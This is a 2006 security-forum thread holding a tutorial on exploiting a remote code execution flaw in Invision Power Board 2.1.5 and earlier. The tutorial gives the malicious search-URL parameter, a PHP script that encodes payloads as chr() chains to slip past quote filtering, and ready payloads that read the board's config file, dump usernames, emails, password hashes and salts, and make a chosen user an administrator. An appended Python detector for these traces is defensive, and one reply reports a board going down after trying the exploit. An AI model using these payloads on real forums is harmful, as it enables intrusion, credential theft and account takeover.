Government Security
Network Security Resources

Several Ways To Exploit Invision Power Board <= 2.1.5

5 replies to this topic

#1 crock

crock

    Private First Class

  • Members
  • 83 posts

Posted 26 June 2006 - 06:44 AM

Several ways to exploit Invision Power Board <= 2.1.5 using the vulnerability:
Invision Power Board <= 2.1.5 Multiple Vulnerabilities, Remote Code Execution
(evading quotes filtering technique) – written by crock

With this tutorial, I want you to understand how code can be executed even when quotes and other special characters are not allowed / filtered out.
I am using the latest IPB vulnerability as an example:


'exploit instructions' (from IceShaman & Wells - http://www.governmen...showtopic=20530 ):

- Post in a forum with "eval(die()); //" somewhere in the body of the post
- Use the search form to find text die just by your username (so only one result shows)
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return
- The code should have been executed

In the example above, die() is the php-code being executed.
die() just stops code from being executed, giving us a blank page in this example.

What else can be executed?

01. Execute an external program
02. Getting the usernames/hashes/salts
03. Giving a user admin rights


01. Execute an external program:
using php-function passthru();
example: passthru("cat conf_global.php"); would read the config file of the board.

But... the problem is that this code has to be posted in a thread on the forum.
When posting something, quotes " are replaced by &quot; (more info on this: http://www.w3.org/Ma...mlplus_13.html)

So posting eval(passthru("cat conf_global.php"); ); // on the board is going to be a problem.
In fact everything that gets parsed by eval() should be a string.
So we need to formulate the string passthru("cat conf_global.php"); in some way, without using the quotes.
The only way I can think of is by using the php function chr()

from php.net:
string chr ( int ascii )
Returns a one-character string containing the character specified by ascii


I wrote a little php script to help with that.
<html>
	<head>
		<title>Convert String To PHP ASCII in PHP chr() function</title>
	</head>
	<body>
		<b>Convert String To PHP ASCII in PHP chr() function:</b><br /><br />
		<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="get">
			<textarea name="s" rows="20" cols="100"></textarea>
			<input type="submit">
		</form>
		<br />	
		
		<?php
		// Only read the parameter once the form has been submitted (avoids an undefined-index notice on first load).
		$string = isset($_GET['s']) ? stripslashes($_GET['s']) : "";	
		$chrstring = "";
		for ($i=0; $i < strlen($string); $i++)
		{
			$chrstring .= "chr(" . ord(substr($string,$i,1)) . ")";
			$chrstring .= ($i==strlen($string)-1)?"":".";		
		}	
		
		$toscreenstring = htmlentities($string);
		
		echo "<b>Converted:</b><br />$toscreenstring<br /><b>To:</b><br />$chrstring<br /><br />-";	
		?>
	</body>
</html>

passthru("cat conf_global.php");
should look like this:
chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).
chr(34).chr(99).chr(97).chr(116).chr(32).chr(99).chr(111).chr(110).chr(102).chr(95).chr(103).
chr(108).chr(111).chr(98).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(34).chr(41).chr(59)

To parse this code using the exploit, the following should be posted in the forum:

eval(chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).
chr(34).chr(99).chr(97).chr(116).chr(32).chr(99).chr(111).chr(110).chr(102).chr(95).chr(103).
chr(108).chr(111).chr(98).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(34).chr(41).chr(59)
); //
and some words that are unique on the board

Using the exploit from IceShaman:
- Use the search form to find your unique words (so only one result shows)
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return
- The contents of conf_global.php are now displayed on the page.
You should check the source code of the page to view the output of the passthru() function.



02. Getting the user data (usernames, hashes, salts, …)

In Invision Power Board, the user data (username, e-mail address) is stored in the table: prefix_members
The hashes are stored in the table: prefix_members_converge

The board's prefix can be found in the conf_global.php file. This can be retrieved using the previously described method, or it can simply be retrieved with the following php code:
include('conf_global.php');
$fprefix = $INFO['sql_tbl_prefix'];

This code retrieves the id,name,email,pass_hash,pass_salt from the 2 tables mentioned before:

include('conf_global.php');
$fprefix = $INFO['sql_tbl_prefix'];

echo "id,name,email,pass_hash,pass_salt";
$sql = "SELECT * FROM ".$fprefix."members, ".$fprefix."members_converge WHERE ".$fprefix."members.id = ".$fprefix."members_converge.converge_id";
$result = mysql_query($sql) or die(mysql_error());
while ($row = mysql_fetch_array($result)){
	echo $row['id'].",".$row['name'].",".$row['email'].",".$row['converge_pass_hash'].
",".$row['converge_pass_salt']."<br>";
}
echo "<noscript>";

This code cannot be executed using the exploits because of the special characters ( “ ; ‘ $) it contains.
The same method described in the first section (01. Execute an external program) can be used to give us the following chr() functions, which form a string:

chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(40).chr(39).chr(99).chr(111).
chr(110).chr(102).chr(95).chr(103).chr(108).chr(111).chr(98).chr(97).chr(108).chr(46).chr(112).
chr(104).chr(112).chr(39).chr(41).chr(59).chr(13).chr(10).chr(36).chr(102).chr(112).chr(114).
chr(101).chr(102).chr(105).chr(120).chr(32).chr(61).chr(32).chr(36).chr(73).chr(78).chr(70).
chr(79).chr(91).chr(39).chr(115).chr(113).chr(108).chr(95).chr(116).chr(98).chr(108).chr(95).
chr(112).chr(114).chr(101).chr(102).chr(105).chr(120).chr(39).chr(93).chr(59).chr(13).chr(10).
…
[truncated]

Using the method described in section 01, this code can be executed on the board.

03. Giving a user admin rights

The following code should set your USERNAME to admin:

include('conf_global.php');
$fprefix = $INFO['sql_tbl_prefix'];
mysql_query("UPDATE ".$fprefix."members SET  mgroup='4' WHERE name=USERNAME");

I am not going to explain everything again.
This code can be executed using the methods described in the previous sections.

Conclusions:
Because the vulnerability has been patched on most boards, I felt it was a good time to write a tutorial about it. With this information, you will understand the technique used to evade the character filters and probably something about the IPB database structure.

btw,
…I am not responsible for any damage you do with this tutorial
…use it wisely


Crock,
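The technique in this post leaves two recognisable traces for whoever runs the board: a post body where eval( is fed a chain of chr() calls, and a request whose lastdate parameter closes the regex delimiter with # and appends the e modifier (with a trailing NUL byte). Below is an added example, written for this page and not part of crock's tutorial or of Invision Power Board, of how a moderator or server administrator could scan for both. It decodes chr() chains back to the string they build (mirroring PHP's modulo-256 behaviour), flags eval( combined with such a chain, and inspects query parameters in access-log lines for the delimiter break, the NUL byte, or a literal eval(. The sample posts and log lines are constructed for the example; only the lastdate parameter and its payload come from the post, the other query keys (act, CODE, searchid) and the log format are assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample inputs (not taken from the thread): two post bodies and two
# access-log lines. The second of each carries the pattern the tutorial describes.
SAMPLE_POSTS = [
    "Has anyone tried the new skin yet? Looks great on my board.",
    "eval(chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117)"
    ".chr(40).chr(34).chr(99).chr(97).chr(116).chr(34).chr(41).chr(59)); // zebra quartz",
]
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jun/2006:06:44:00 +0000] "GET /index.php?act=Search&CODE=show'
    '&searchid=abc123&lastdate=2006-06-25 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [26/Jun/2006:06:45:10 +0000] "GET /index.php?act=Search&CODE=show'
    '&searchid=abc123&lastdate=z|eval.*?%20//)%23e%00 HTTP/1.1" 200 512',
]

# A run of chr(N) calls joined with the PHP concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\))*", re.I)
CHR_ARG = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.I)
EVAL_CALL = re.compile(r"\beval\s*\(", re.I)
# Function names whose appearance inside a decoded chain deserves a look.
FLAGGED = ("passthru", "system", "exec", "shell_exec", "include", "mysql_query")


def decode_chr_chains(text):
    """Decode every chr(N).chr(N)... run into the string it builds.
    PHP's chr() reduces its argument modulo 256, so mirror that here."""
    out = []
    for m in CHR_CHAIN.finditer(text):
        codes = [int(c) % 256 for c in CHR_ARG.findall(m.group(0))]
        out.append("".join(chr(c) for c in codes))
    return out


def assess_post(body):
    """Summarise one post body: decoded chains, presence of eval(, flagged names."""
    decoded = decode_chr_chains(body)
    joined = " ".join(decoded)
    has_eval = EVAL_CALL.search(body) is not None
    return {
        "decoded": decoded,
        "has_eval": has_eval,
        "functions": [fn for fn in FLAGGED if fn in joined],
        # eval( plus an obfuscated string is the combination the tutorial relies on
        "suspicious": has_eval and bool(decoded),
    }


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# '#' closing a PCRE delimiter, then modifier letters that include 'e',
# optionally terminated by a NUL byte (the %23e%00 tail shown in the post).
E_MODIFIER = re.compile(r"#[a-zA-Z]*e[a-zA-Z]*(?:\x00|$)")


def inspect_request(log_line):
    """Return a list of findings for one access-log line (empty list = nothing seen)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    params = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
    findings = []
    for key, values in params.items():
        for value in values:  # parse_qs has already percent-decoded the value
            if "\x00" in value:
                findings.append(f"{key}: NUL byte in value")
            if E_MODIFIER.search(value):
                findings.append(f"{key}: regex delimiter break with /e modifier")
            if EVAL_CALL.search(value):
                findings.append(f"{key}: eval( in parameter")
    return findings


if __name__ == "__main__":
    for body in SAMPLE_POSTS:
        print(assess_post(body))
    for line in SAMPLE_LOG:
        print(inspect_request(line))
```

The decoder deliberately reconstructs the string rather than matching on chr( alone: a long chr() chain in a post is unusual but not itself proof of anything, while eval( next to a chain that decodes to passthru or include is. On the request side the check keys off the delimiter break and the NUL byte rather than the literal word eval, since the same break works with any expression once the e modifier is in place.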




#2 aelphaeis_mangarae

aelphaeis_mangarae

    Members

  • Sergeant Major
  • 973 posts

Posted 26 June 2006 - 05:38 PM

When I saw this I expected it to be a tutorial written by some script kiddie.

Best tutorial I have seen on using an exploit and understanding how it works (maybe the only one I have seen...)

Good job :)

I think it's good you waited before publishing this tutorial.

#3 warzone

warzone

    Private

  • Members
  • 7 posts

Posted 26 June 2006 - 06:16 PM

I posted eval(die()); // and tried searching for die, but there needs to be at least 4 char. one minute later the board was down! Does this have anything to do with the code?

#4 Tec

Tec

    Specialist

  • Members
  • 117 posts

Posted 26 June 2006 - 06:46 PM

I've gotta agree with aelphaeis_mangarae on this one. It was excellently written and shows respect for security, privacy, and the art in general. Thanks, nice work.

#5 crock

crock

    Private First Class

  • Members
  • 83 posts

Posted 29 June 2006 - 03:12 AM

thank you all for the positive replies,
I've added a pdf version of it

#6 Jeremy

Jeremy

    Commander in Chief

  • Retired Admin
  • 2,459 posts

Posted 30 June 2006 - 01:45 PM

Great Tutorial. Archived, with link left in Tutorial forum.




